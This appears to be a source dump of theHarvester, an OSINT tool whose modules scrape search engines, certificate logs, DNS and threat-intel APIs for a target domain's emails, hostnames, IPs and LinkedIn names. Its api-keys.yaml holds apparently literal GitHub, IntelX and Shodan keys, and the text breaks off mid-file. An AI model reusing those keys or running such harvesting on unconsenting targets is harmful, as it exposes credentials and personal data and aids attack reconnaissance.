/Plugins/infoGather/subdomain/theHarvester/README/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # Contributing to theHarvester Project
2 | Welcome to theHarvester project, so you would like to contribute.
3 | The following below must be met to get accepted.
4 |
5 | # CI
6 | Make sure all CI passes and you do not introduce any alerts from lgtm.
7 |
8 | # Unit Tests
9 | For new modules a unit test for that module is required and we use pytest.
10 |
11 | # Coding Standards
12 | * No single letter variables and variable names must represent the action that it is performing
13 | * Have static typing on functions etc
14 | * Make sure no errors are reported from mypy
15 | * No issues reported with flake8
16 |
17 | # Submitting Bugs
18 | If you find a bug in a module that you want to submit an issue for and know how to write python code.
19 | Please create a unit test for that bug(If possible) and submit a fix for it as it would be a big help to the project.
20 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/README/LICENSES:
--------------------------------------------------------------------------------
1 | Released under the GPL v 2.0.
2 |
3 | If you did not receive a copy of the GPL, try http://www.gnu.org/.
4 |
5 | Copyright 2011 Christian Martorella
6 |
7 | theHarvester is free software; you can redistribute it and/or modify
8 | it under the terms of the GNU General Public License as published by
9 | the Free Software Foundation version 2 of the License.
10 |
11 | theHarvester is distributed in the hope that it will be useful,
12 | but WITHOUT ANY WARRANTY; without even the implied warranty of
13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | GNU General Public License for more details.
15 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
16 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/api-keys.yaml:
--------------------------------------------------------------------------------
1 | apikeys:
2 | bing:
3 | key:
4 |
5 | github:
6 | key: 6571b30a3aa4cdd8a5e0ec6a49033fb47daf373a
7 |
8 | hunter:
9 | key:
10 |
11 | intelx:
12 | key: 9df61df0-84f7-4dc7-b34c-8ccfb8646ace
13 |
14 | pentestTools:
15 | key:
16 |
17 | securityTrails:
18 | key:
19 |
20 | shodan:
21 | key: jAMql7At3FkMTO6tE3XqtNFegKvLxRXu
22 |
23 | spyse:
24 | key:
25 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/mypy.ini:
--------------------------------------------------------------------------------
1 | [mypy]
2 | ignore_missing_imports = True
3 | show_traceback = True
4 | show_error_codes = True
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/proxies.yaml:
--------------------------------------------------------------------------------
1 | http:
2 | - ip:port
3 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/requirements.txt:
--------------------------------------------------------------------------------
1 | -r requirements/base.txt
2 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/requirements/base.txt:
--------------------------------------------------------------------------------
1 | aiodns==2.0.0
2 | aiohttp==3.6.2
3 | aiosqlite==0.13.0
4 | beautifulsoup4==4.9.1
5 | dnspython==1.16.0
6 | netaddr==0.7.19
7 | plotly==4.7.1
8 | PyYAML==5.3.1
9 | requests==2.23.0
10 | retrying==1.3.3
11 | shodan==1.23.0
12 | texttable==1.6.2
13 | lxml==4.5.1
14 | uvloop==0.14.0
15 | certifi==2020.4.5.1
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/requirements/dev.txt:
--------------------------------------------------------------------------------
1 | -r base.txt
2 | flake8==3.8.2
3 | mypy==0.770
4 | mypy-extensions==0.4.3
5 | pyflakes==2.2.0
6 | pytest==5.4.2
7 | pytest-asyncio==0.12.0
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = ['baidusearch',
2 | 'bingsearch',
3 | 'bufferoverun',
4 | 'crtsh',
5 | 'certspottersearch',
6 | 'dnssearch',
7 | 'dogpilesearch',
8 | 'duckduckgosearch',
9 | 'exaleadsearch',
10 | 'githubcode',
11 | 'googlesearch',
12 | 'hackertarget',
13 | 'huntersearch',
14 | 'intelxsearch',
15 | 'linkedinsearch',
16 | 'netcraft',
17 | 'otxsearch',
18 | 'pentesttools',
19 | 'rapiddns',
20 | 'securitytrailssearch',
21 | 'shodansearch',
22 | 'spyse',
23 | 'sublist3r',
24 | 'takeover',
25 | 'threatcrowd',
26 | 'trello',
27 | 'twittersearch',
28 | 'urlscan',
29 | 'virustotal',
30 | 'yahoosearch',
31 | ]
32 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/baidusearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import myparser
3 |
4 | class SearchBaidu:
5 |
6 | def __init__(self, word, limit):
7 | self.word = word
8 | self.total_results = ""
9 | self.server = 'www.baidu.com'
10 | self.hostname = 'www.baidu.com'
11 | self.limit = limit
12 | self.proxy = False
13 |
14 | async def do_search(self):
15 | headers = {
16 | 'Host': self.hostname,
17 | 'User-agent': Core.get_user_agent()
18 | }
19 | base_url = f'https://{self.server}/s?wd=%40{self.word}&pnxx&oq={self.word}'
20 | urls = [base_url.replace("xx", str(num)) for num in range(0, self.limit, 10) if num <= self.limit]
21 | responses = await AsyncFetcher.fetch_all(urls, headers=headers, proxy=self.proxy)
22 | for response in responses:
23 | self.total_results += response
24 |
25 | async def process(self, proxy=False):
26 | self.proxy = proxy
27 | await self.do_search()
28 |
29 | async def get_emails(self):
30 | rawres = myparser.Parser(self.total_results, self.word)
31 | return await rawres.emails()
32 |
33 | async def get_hostnames(self):
34 | rawres = myparser.Parser(self.total_results, self.word)
35 | return await rawres.hostnames()
36 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/bufferoverun.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 | import re
3 |
4 |
5 | class SearchBufferover:
6 | def __init__(self, word):
7 | self.word = word
8 | self.totalhosts = set()
9 | self.totalips = set()
10 | self.proxy = False
11 |
12 | async def do_search(self):
13 | url = f'https://dns.bufferover.run/dns?q=.{self.word}'
14 | responses = await AsyncFetcher.fetch_all(urls=[url], json=True, proxy=self.proxy)
15 | responses = responses[0]
16 | dct = responses
17 |
18 | self.totalhosts: set = {
19 | host.split(',')[0].replace('www.', '') if ',' in host and self.word.replace('www.', '') in host.split(',')[
20 | 0] in host else
21 | host.split(',')[1] for host in dct['FDNS_A']}
22 |
23 | self.totalips: set = {ip.split(',')[0] for ip in dct['FDNS_A'] if
24 | re.match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$", ip.split(',')[0])}
25 |
26 | async def get_hostnames(self) -> set:
27 | return self.totalhosts
28 |
29 | async def get_ips(self) -> set:
30 | return self.totalips
31 |
32 | async def process(self, proxy=False):
33 | self.proxy = proxy
34 | await self.do_search()
35 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/certspottersearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 |
3 |
4 | class SearchCertspoter:
5 |
6 | def __init__(self, word):
7 | self.word = word
8 | self.totalhosts = set()
9 | self.proxy = False
10 |
11 | async def do_search(self) -> None:
12 | base_url = f'https://api.certspotter.com/v1/issuances?domain={self.word}&expand=dns_names'
13 | try:
14 | response = await AsyncFetcher.fetch_all([base_url], json=True, proxy=self.proxy)
15 | response = response[0]
16 | if isinstance(response, list):
17 | for dct in response:
18 | for key, value in dct.items():
19 | if key == 'dns_names':
20 | self.totalhosts.update({name for name in value if name})
21 | elif isinstance(response, dict):
22 | self.totalhosts.update({response['dns_names'] if 'dns_names' in response.keys() else ''})
23 | else:
24 | self.totalhosts.update({''})
25 | except Exception as e:
26 | print(e)
27 |
28 | async def get_hostnames(self) -> set:
29 | return self.totalhosts
30 |
31 | async def process(self, proxy=False):
32 | self.proxy = proxy
33 | await self.do_search()
34 | print('\tSearching results.')
35 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/crtsh.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 | from typing import List
3 |
4 |
5 | class SearchCrtsh:
6 |
7 | def __init__(self, word):
8 | self.word = word
9 | self.data = set()
10 | self.proxy = False
11 |
12 | async def do_search(self) -> List:
13 | data: set = set()
14 | try:
15 | url = f'https://crt.sh/?q=%25.{self.word}&output=json'
16 | response = await AsyncFetcher.fetch_all([url], json=True, proxy=self.proxy)
17 | response = response[0]
18 | data = set(
19 | [dct['name_value'][2:] if '*.' == dct['name_value'][:2] else dct['name_value']
20 | for dct in response])
21 | data = {domain for domain in data if (domain[0] != '*' and str(domain[0:4]).isnumeric() is False)}
22 | except Exception as e:
23 | print(e)
24 | clean = []
25 | for x in data:
26 | pre = x.split()
27 | for y in pre:
28 | clean.append(y)
29 | return clean
30 |
31 | async def process(self, proxy=False) -> None:
32 | self.proxy = proxy
33 | data = await self.do_search()
34 | self.data = data
35 |
36 | async def get_hostnames(self) -> Set:
37 | return self.data
38 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/dnsdumpster.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import myparser
3 | import aiohttp
4 | import asyncio
5 |
6 |
7 | class SearchDnsDumpster:
8 |
9 | def __init__(self, word):
10 | self.word = word.replace(' ', '%20')
11 | self.results = ""
12 | self.totalresults = ""
13 | self.server = 'dnsdumpster.com'
14 | self.proxy = False
15 |
16 | async def do_search(self):
17 | try:
18 | agent = Core.get_user_agent()
19 | headers = {'User-Agent': agent}
20 | session = aiohttp.ClientSession(headers=headers)
21 | # create a session to properly verify
22 | url = f'https://{self.server}'
23 | csrftoken = ''
24 | if self.proxy is False:
25 | async with session.get(url, headers=headers) as resp:
26 | cookies = str(resp.cookies)
27 | cookies = cookies.split('csrftoken=')
28 | csrftoken += cookies[1][:cookies[1].find(';')]
29 | else:
30 | async with session.get(url, headers=headers, proxy=self.proxy) as resp:
31 | cookies = str(resp.cookies)
32 | cookies = cookies.split('csrftoken=')
33 | csrftoken += cookies[1][:cookies[1].find(';')]
34 | await asyncio.sleep(2)
35 |
36 | # extract csrftoken from cookies
37 | data = {
38 | 'Cookie': f'csfrtoken={csrftoken}', 'csrfmiddlewaretoken': csrftoken, 'targetip': self.word}
39 | headers['Referer'] = url
40 | if self.proxy is False:
41 | async with session.post(url, headers=headers, data=data) as resp:
42 | self.results = await resp.text()
43 | else:
44 | async with session.post(url, headers=headers, data=data, proxy=self.proxy) as resp:
45 | self.results = await resp.text()
46 | await session.close()
47 | except Exception as e:
48 | print(f'An exception occurred: {e}')
49 | self.totalresults += self.results
50 |
51 | async def get_hostnames(self):
52 | rawres = myparser.Parser(self.totalresults, self.word)
53 | return await rawres.hostnames()
54 |
55 | async def process(self, proxy=False):
56 | self.proxy = proxy
57 | await self.do_search() # Only need to do it once.
58 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/dogpilesearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import myparser
3 |
4 |
5 | class SearchDogpile:
6 |
7 | def __init__(self, word, limit):
8 | self.word = word
9 | self.total_results = ""
10 | self.server = 'www.dogpile.com'
11 | self.hostname = 'www.dogpile.com'
12 | self.limit = limit
13 | self.proxy = False
14 |
15 | async def do_search(self):
16 | # Dogpile is hardcoded to return 10 results.
17 | try:
18 | headers = {'User-agent': Core.get_user_agent()}
19 | base_url = f'https://{self.server}/search/web?qsi=xx&q=%40{self.word}'
20 | urls = [base_url.replace("xx", str(num)) for num in range(0, self.limit, 10) if num <= self.limit]
21 | responses = await AsyncFetcher.fetch_all(urls, headers=headers, proxy=self.proxy)
22 | for response in responses:
23 | self.total_results += response
24 | except Exception as e:
25 | print(f'Error Occurred: {e}')
26 |
27 | async def process(self, proxy=False):
28 | self.proxy = proxy
29 | await self.do_search()
30 |
31 | async def get_emails(self):
32 | rawres = myparser.Parser(self.total_results, self.word)
33 | return await rawres.emails()
34 |
35 | async def get_hostnames(self):
36 | rawres = myparser.Parser(self.total_results, self.word)
37 | return await rawres.hostnames()
38 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/hackertarget.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 |
3 |
4 | class SearchHackerTarget:
5 | """
6 | Class uses the HackerTarget api to gather subdomains and ips
7 | """
8 | def __init__(self, word):
9 | self.word = word
10 | self.total_results = ""
11 | self.hostname = 'https://api.hackertarget.com'
12 | self.proxy = False
13 | self.results = None
14 |
15 | async def do_search(self):
16 | headers = {'User-agent': Core.get_user_agent()}
17 | urls = [f'{self.hostname}/hostsearch/?q={self.word}', f'{self.hostname}/reversedns/?q={self.word}']
18 | responses = await AsyncFetcher.fetch_all(urls, headers=headers, proxy=self.proxy)
19 | for response in responses:
20 | self.total_results += response.replace(",", ":")
21 |
22 | async def process(self, proxy=False):
23 | self.proxy = proxy
24 | await self.do_search()
25 |
26 | async def get_hostnames(self) -> list:
27 | return self.total_results.splitlines()
28 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/huntersearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.discovery.constants import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import myparser
4 |
5 |
6 | class SearchHunter:
7 |
8 | def __init__(self, word, limit, start):
9 | self.word = word
10 | self.limit = limit
11 | self.start = start
12 | self.key = Core.hunter_key()
13 | if self.key is None:
14 | raise MissingKey(True)
15 | self.total_results = ""
16 | self.counter = start
17 | self.database = f'https://api.hunter.io/v2/domain-search?domain={word}&api_key={self.key}&limit={self.limit}'
18 | self.proxy = False
19 |
20 | async def do_search(self):
21 | responses = await AsyncFetcher.fetch_all([self.database], headers={'User-Agent': Core.get_user_agent()},
22 | proxy=self.proxy)
23 | self.total_results += responses[0]
24 |
25 | async def process(self, proxy=False):
26 | self.proxy = proxy
27 | await self.do_search() # Only need to do it once.
28 |
29 | async def get_emails(self):
30 | rawres = myparser.Parser(self.total_results, self.word)
31 | return await rawres.emails()
32 |
33 | async def get_hostnames(self):
34 | rawres = myparser.Parser(self.total_results, self.word)
35 | return await rawres.hostnames()
36 |
37 | async def get_profiles(self):
38 | rawres = myparser.Parser(self.total_results, self.word)
39 | return await rawres.profiles()
40 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/intelxsearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.discovery.constants import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import intelxparser
4 | import asyncio
5 |
6 |
7 | class SearchIntelx:
8 |
9 | def __init__(self, word, limit):
10 | self.word = word
11 | # default key is public key
12 | self.key = Core.intelx_key()
13 | if self.key is None:
14 | raise MissingKey(True)
15 | self.database = 'https://public.intelx.io/'
16 | self.results = None
17 | self.info = ()
18 | self.limit = limit
19 | self.proxy = False
20 |
21 | async def do_search(self):
22 | try:
23 | user_agent = Core.get_user_agent()
24 | headers = {'User-Agent': user_agent, 'x-key': self.key}
25 | # data is json that corresponds to what we are searching for, sort:2 means sort by most relevant
26 | data = f'{{"term": "{self.word}", "maxresults": {self.limit}, "media": 0, "sort": 2 , "terminate": []}}'
27 | resp = await AsyncFetcher.post_fetch(url=f'{self.database}phonebook/search', headers=headers, data=data,
28 | json=True, proxy=self.proxy)
29 | uuid = resp['id']
30 | # grab uuid to send get request to fetch data
31 | await asyncio.sleep(2)
32 | url = f'{self.database}phonebook/search/result?id={uuid}&offset=0&limit={self.limit}'
33 | resp = await AsyncFetcher.fetch_all([url], headers=headers, json=True, proxy=self.proxy)
34 | resp = resp[0]
35 | # TODO: Check if more results can be gathered depending on status
36 | self.results = resp
37 | except Exception as e:
38 | print(f'An exception has occurred: {e.args}')
39 |
40 | async def process(self, proxy=False):
41 | self.proxy = proxy
42 | await self.do_search()
43 | intelx_parser = intelxparser.Parser()
44 | self.info = await intelx_parser.parse_dictionaries(self.results)
45 | # Create parser and set self.info to tuple returned from parsing text.
46 |
47 | async def get_emails(self):
48 | return self.info[0]
49 |
50 | async def get_hostnames(self):
51 | return self.info[1]
52 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/linkedinsearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.discovery.constants import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import myparser
4 | import asyncio
5 |
6 |
7 | class SearchLinkedin:
8 |
9 | def __init__(self, word, limit):
10 | self.word = word.replace(' ', '%20')
11 | self.results = ""
12 | self.totalresults = ""
13 | self.server = 'www.google.com'
14 | self.quantity = '100'
15 | self.limit = int(limit)
16 | self.counter = 0
17 | self.proxy = False
18 |
19 | async def do_search(self):
20 | urly = 'http://' + self.server + '/search?num=100&start=' + str(self.counter) + '&hl=en&meta=&q=site%3Alinkedin.com/in%20' + self.word
21 | try:
22 | headers = {'User-Agent': Core.get_user_agent()}
23 | resp = await AsyncFetcher.fetch_all([urly], headers=headers, proxy=self.proxy)
24 | self.results = resp[0]
25 | if await search(self.results):
26 | try:
27 | self.results = await google_workaround(urly)
28 | if isinstance(self.results, bool):
29 | print('Google is blocking your ip and the workaround, returning')
30 | return
31 | except Exception:
32 | # google blocked, no useful result
33 | return
34 | except Exception as e:
35 | print(e)
36 | await asyncio.sleep(get_delay())
37 | self.totalresults += self.results
38 |
39 | async def get_people(self):
40 | rawres = myparser.Parser(self.totalresults, self.word)
41 | temp = await rawres.people_linkedin()
42 | return [person for person in temp
43 | if person[0] != '.' and '...' not in person and len(person.split()) != 1]
44 |
45 | async def get_links(self):
46 | links = myparser.Parser(self.totalresults, self.word)
47 | return await splitter(await links.links_linkedin())
48 |
49 | async def process(self, proxy=False):
50 | self.proxy = proxy
51 | while self.counter < self.limit:
52 | await self.do_search()
53 | await asyncio.sleep(get_delay())
54 | self.counter += 100
55 | print(f'\tSearching {self.counter} results.')
56 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/otxsearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 | import re
3 |
4 |
5 | class SearchOtx:
6 |
7 | def __init__(self, word):
8 | self.word = word
9 | self.totalhosts = set()
10 | self.totalips = set()
11 | self.proxy = False
12 |
13 | async def do_search(self):
14 | url = f'https://otx.alienvault.com/api/v1/indicators/domain/{self.word}/passive_dns'
15 | response = await AsyncFetcher.fetch_all([url], json=True, proxy=self.proxy)
16 | responses = response[0]
17 | dct = responses
18 | self.totalhosts: set = {host['hostname'] for host in dct['passive_dns']}
19 | # filter out ips that are just called NXDOMAIN
20 | self.totalips: set = {ip['address'] for ip in dct['passive_dns']
21 | if re.match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$", ip['address'])}
22 |
23 | async def get_hostnames(self) -> set:
24 | return self.totalhosts
25 |
26 | async def get_ips(self) -> set:
27 | return self.totalips
28 |
29 | async def process(self, proxy=False):
30 | self.proxy = proxy
31 | await self.do_search()
32 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/rapiddns.py:
--------------------------------------------------------------------------------
1 | from bs4 import BeautifulSoup
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 |
4 |
5 | class SearchRapidDns:
6 |
7 | def __init__(self, word):
8 | self.word = word
9 | self.total_results = []
10 | self.hostname = 'rapiddns.io'
11 | self.proxy = False
12 |
13 | async def do_search(self):
14 | try:
15 | headers = {'User-agent': Core.get_user_agent()}
16 | # TODO see if it's worth adding sameip searches
17 | # f'{self.hostname}/sameip/{self.word}?full=1#result'
18 | urls = [f'https://{self.hostname}/subdomain/{self.word}?full=1#result']
19 | responses = await AsyncFetcher.fetch_all(urls, headers=headers, proxy=self.proxy)
20 | if len(responses[0]) <= 1:
21 | return self.total_results
22 | soup = BeautifulSoup(responses[0], 'html.parser')
23 | rows = soup.find("table").find("tbody").find_all("tr")
24 | if rows:
25 | # Sanity check
26 | for row in rows:
27 | cells = row.find_all("td")
28 | if len(cells) >= 0:
29 | # sanity check
30 | subdomain = str(cells[0].get_text())
31 | if cells[-1].get_text() == 'CNAME':
32 | self.total_results.append(f'{subdomain}')
33 | else:
34 | self.total_results.append(f'{subdomain}:{str(cells[1].get_text()).strip()}')
35 | self.total_results = list({domain for domain in self.total_results})
36 | except Exception as e:
37 | print(f'An exception has occurred: {str(e.args)}')
38 |
39 | async def process(self, proxy=False):
40 | self.proxy = proxy
41 | await self.do_search()
42 |
43 | async def get_hostnames(self):
44 | return self.total_results
45 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/securitytrailssearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.discovery.constants import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import securitytrailsparser
4 | import asyncio
5 |
6 |
7 | class SearchSecuritytrail:
8 |
9 | def __init__(self, word):
10 | self.word = word
11 | self.key = Core.security_trails_key()
12 | if self.key is None:
13 | raise MissingKey(True)
14 | self.results = ""
15 | self.totalresults = ""
16 | self.api = 'https://api.securitytrails.com/v1/'
17 | self.info = ()
18 | self.proxy = False
19 |
20 | async def authenticate(self) -> None:
21 | # Method to authenticate API key before sending requests.
22 | headers = {'APIKEY': self.key}
23 | url = f'{self.api}ping'
24 | auth_responses = await AsyncFetcher.fetch_all([url], headers=headers, proxy=self.proxy)
25 | auth_responses = auth_responses[0]
26 | if 'False' in auth_responses or 'Invalid authentication' in auth_responses:
27 | print('\tKey could not be authenticated exiting program.')
28 | await asyncio.sleep(2)
29 |
30 | async def do_search(self) -> None:
31 | # https://api.securitytrails.com/v1/domain/domain.com
32 | url = f'{self.api}domain/{self.word}'
33 | headers = {'APIKEY': self.key}
34 | response = await AsyncFetcher.fetch_all([url], headers=headers, proxy=self.proxy)
35 | await asyncio.sleep(2) # Not random delay because 2 seconds is required due to rate limit.
36 | self.results = response[0]
37 | self.totalresults += self.results
38 | url += '/subdomains' # Get subdomains now.
39 | subdomain_response = await AsyncFetcher.fetch_all([url], headers=headers, proxy=self.proxy)
40 | await asyncio.sleep(2)
41 | self.results = subdomain_response[0]
42 | self.totalresults += self.results
43 |
44 | async def process(self, proxy=False) -> None:
45 | self.proxy = proxy
46 | await self.authenticate()
47 | await self.do_search()
48 | parser = securitytrailsparser.Parser(word=self.word, text=self.totalresults)
49 | self.info = await parser.parse_text()
50 | # Create parser and set self.info to tuple returned from parsing text.
51 | print('\tDone Searching Results')
52 |
53 | async def get_ips(self) -> set:
54 | return self.info[0]
55 |
56 | async def get_hostnames(self) -> set:
57 | return self.info[1]
58 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/shodansearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.discovery.constants import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 | from shodan import exception
4 | from shodan import Shodan
5 |
6 |
7 | class SearchShodan:
8 |
9 | def __init__(self):
10 | self.key = Core.shodan_key()
11 | if self.key is None:
12 | raise MissingKey(True)
13 | self.api = Shodan(self.key)
14 | self.hostdatarow = []
15 |
16 | async def search_ip(self, ip):
17 | try:
18 | ipaddress = ip
19 | results = self.api.host(ipaddress)
20 | technologies = []
21 | servicesports = []
22 | for result in results['data']:
23 | try:
24 | for key in result['http']['components'].keys():
25 | technologies.append(key)
26 | except KeyError:
27 | pass
28 | port = str(result.get('port'))
29 | product = str(result.get('product'))
30 | servicesports.append(str(product) + ':' + str(port))
31 | technologies = list(set(technologies))
32 | self.hostdatarow = [
33 | str(results.get('ip_str')), str(results.get('hostnames')).strip('[]\''),
34 | str(results.get('org')), str(servicesports).replace('\'', '').strip('[]'),
35 | str(technologies).replace('\'', '').strip('[]')]
36 | except exception.APIError:
37 | print(f'{ipaddress}: Not in Shodan')
38 | self.hostdatarow = [ipaddress, "Not in Shodan", "Not in Shodan", "Not in Shodan", "Not in Shodan"]
39 |
40 | except Exception as e:
41 | print(f'Error occurred in the Shodan IP search module: {e}')
42 | finally:
43 | return self.hostdatarow
44 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/spyse.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.discovery.constants import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 |
4 |
5 | class SearchSpyse:
6 |
7 | def __init__(self, word):
8 | self.ips = set()
9 | self.word = word
10 | self.key = Core.spyse_key()
11 | if self.key is None:
12 | raise MissingKey(True)
13 | self.results = ''
14 | self.hosts = set()
15 | self.proxy = False
16 |
17 | async def do_search(self):
18 | try:
19 | headers = {
20 | 'accept': 'application/json',
21 | 'Authorization': f'Bearer {self.key}',
22 | }
23 | base_url = f'https://api.spyse.com/v2/data/domain/subdomain?limit=100&domain={self.word}'
24 | results = await AsyncFetcher.fetch_all([base_url], json=True, proxy=self.proxy, headers=headers)
25 | results = results[0]
26 | self.hosts = {domain['name'] for domain in results['data']['items']}
27 | except Exception as e:
28 | print(f'An exception has occurred: {e.args}')
29 |
30 | async def get_hostnames(self):
31 | return self.hosts
32 |
33 | async def process(self, proxy=False):
34 | self.proxy = proxy
35 | await self.do_search()
36 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/sublist3r.py:
--------------------------------------------------------------------------------
1 | from typing import Type
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 |
4 |
5 | class SearchSublist3r:
6 |
7 | def __init__(self, word):
8 | self.word = word
9 | self.totalhosts = list
10 | self.proxy = False
11 |
12 | async def do_search(self):
13 | url = f'https://api.sublist3r.com/search.php?domain={self.word}'
14 | response = await AsyncFetcher.fetch_all([url], json=True, proxy=self.proxy)
15 | self.totalhosts: list = response[0]
16 |
17 | async def get_hostnames(self) -> Type[list]:
18 | return self.totalhosts
19 |
20 | async def process(self, proxy=False):
21 | self.proxy = proxy
22 | await self.do_search()
23 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/suip.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 | from bs4 import BeautifulSoup
3 | import asyncio
4 |
5 |
6 | class SearchSuip:
7 |
8 | def __init__(self, word: str):
9 | self.word: str = word
10 | self.results: str = ''
11 | self.totalresults: str = ''
12 | self.totalhosts: set = set()
13 | self.totalips: set = set()
14 | self.proxy = False
15 |
16 | async def request(self, url, params, findomain=False):
17 | headers = {'User-Agent': Core.get_user_agent()}
18 | data = {'url': self.word.replace('www.', ''), 'only_resolved': '1', 'Submit1': 'Submit'} if findomain else \
19 | {'url': self.word.replace('www.', ''), 'Submit1': 'Submit'}
20 | return await AsyncFetcher.post_fetch(url, headers=headers, params=params, data=data, proxy=self.proxy)
21 |
22 | async def handler(self, url):
23 | first_param = [url, (('act', 'subfinder'),), False]
24 | second_param = [url, (('act', 'amass'),), False]
25 | third_param = [url, (('act', 'findomain'),), True]
26 | async_requests = [
27 | self.request(url=url, params=params, findomain=findomain)
28 | for url, params, findomain in [first_param, second_param, third_param]
29 | ]
30 | results = await asyncio.gather(*async_requests)
31 | return results
32 |
33 | async def do_search(self):
34 | try:
35 | results = await self.handler(url="https://suip.biz/")
36 | for num in range(len(results)):
37 | # iterate through results and parse out the urls
38 | result = results[num]
39 | soup = BeautifulSoup(str(result), 'html.parser')
40 | hosts: list = str(soup.find('pre')).splitlines() if num != 2 else \
41 | [line for line in str(soup.find('pre')).splitlines() if 'A total of' not in line]
42 | # The last iteration is special because findomain throws in some more lines that we need to filter out
43 | await self.clean_hosts(hosts)
44 | except Exception as e:
45 | print(f'An exception has occurred: {e.args}')
46 |
47 | async def get_hostnames(self) -> set:
48 | return self.totalhosts
49 |
50 | async def process(self, proxy=False):
51 | self.proxy = proxy
52 | await self.do_search()
53 | print('\tSearching results.')
54 |
55 | async def clean_hosts(self, soup_hosts):
56 | for host in soup_hosts:
57 | host = str(host).strip()
58 | if len(host) > 1 and self.word.replace('www.', '') in host:
